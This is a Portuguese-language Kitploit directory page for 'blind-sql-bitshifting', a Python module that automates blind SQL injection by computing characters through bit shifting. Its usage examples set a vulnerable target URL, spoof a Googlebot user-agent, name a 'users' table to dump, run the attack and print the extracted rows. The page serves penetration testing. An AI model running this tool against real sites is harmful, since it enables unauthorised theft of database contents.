Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
blind-sql-bitshifting — Um módulo de injeção SQL cega que usa deslocamento de bits para calcular caracteres. | Kitploit
Ferramentas/GitHubGitHub/awnumar/blind-sql-bitshifting
Análise de VulnerabilidadesExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoArchived
GitHubawnumar/blind-sql-bitshifting

blind-sql-bitshifting

Um módulo de injeção SQL cega que usa deslocamento de bits para calcular caracteres.

Ver Repositório
13349há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Injeção SQL Cega via Deslocamento de Bits

Este é um módulo que realiza injeção SQL cega usando o método de deslocamento de bits para calcular caracteres em vez de adivinhá-los. Requer 7/8 requisições por caractere, dependendo da configuração.

Uso

root@kitploit:~
import blind-sql-bitshifting as x

# Edit this dictionary to configure attack vectors
x.options

Exemplo de configuração:

root@kitploit:~
# Vulnerable link
x.options["target"] = "http://www.example.com/index.php?id=1"

# Specify cookie (optional)
x.options["cookies"] = ""

# Specify a condition for a specific row, e.g. 'uid=1' for admin (optional)
x.options["row_condition"] = ""

# Boolean option for following redirections
x.options["follow_redirections"] = 0

# Specify user-agent
x.options["user_agent"] = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

# Specify table to dump
x.options["table_name"] = "users"

# Specify columns to dump
x.options["columns"] = "id, username"

# String to check for on page after successful statement
x.options["truth_string"] = "<p id='success'>true</p>"

# See below
x.options["assume_only_ascii"] = 1

A opção assume_only_ascii faz o módulo assumir que os caracteres que está extraindo são todos ASCII. Como o conjunto de caracteres ASCII vai apenas até 127, podemos definir o primeiro bit como 0 e não nos preocupar em calculá-lo. Isso representa uma redução de 12,5% nas requisições. Testando localmente, isso resultou em um aumento médio de velocidade de 15%. É claro que isso pode causar problemas ao extrair caracteres fora do intervalo ASCII. Por padrão, está definido como 0.

Uma vez configurado:

root@kitploit:~
data = x.exploit()

Isso retorna um array bidimensional, onde cada sub-array contém uma única linha, sendo a primeira os cabeçalhos das colunas.

Exemplo de saída:

[['id', 'username'], ['1', 'user1'], ['2', 'user2'], ['3', 'user3'], ['4', 'user4']]

Opcionalmente, seus scripts podem então usar o módulo tabulate para exibir os dados:

root@kitploit:~
from tabulate import tabulate

data = x.exploit()

print tabulate(data,
               headers='firstrow',  # This specifies to use the first row as the column headers.
               tablefmt='psql')     # Using the SQL output format. Other formats can be used.

Isso exibiria:

root@kitploit:~
+------+------------+
|   id | username   |
|------+------------|
|    1 | user1      |
|    2 | user2      |
|    3 | user3      |
|    4 | user4      |
+------+------------+
Baixar ferramenta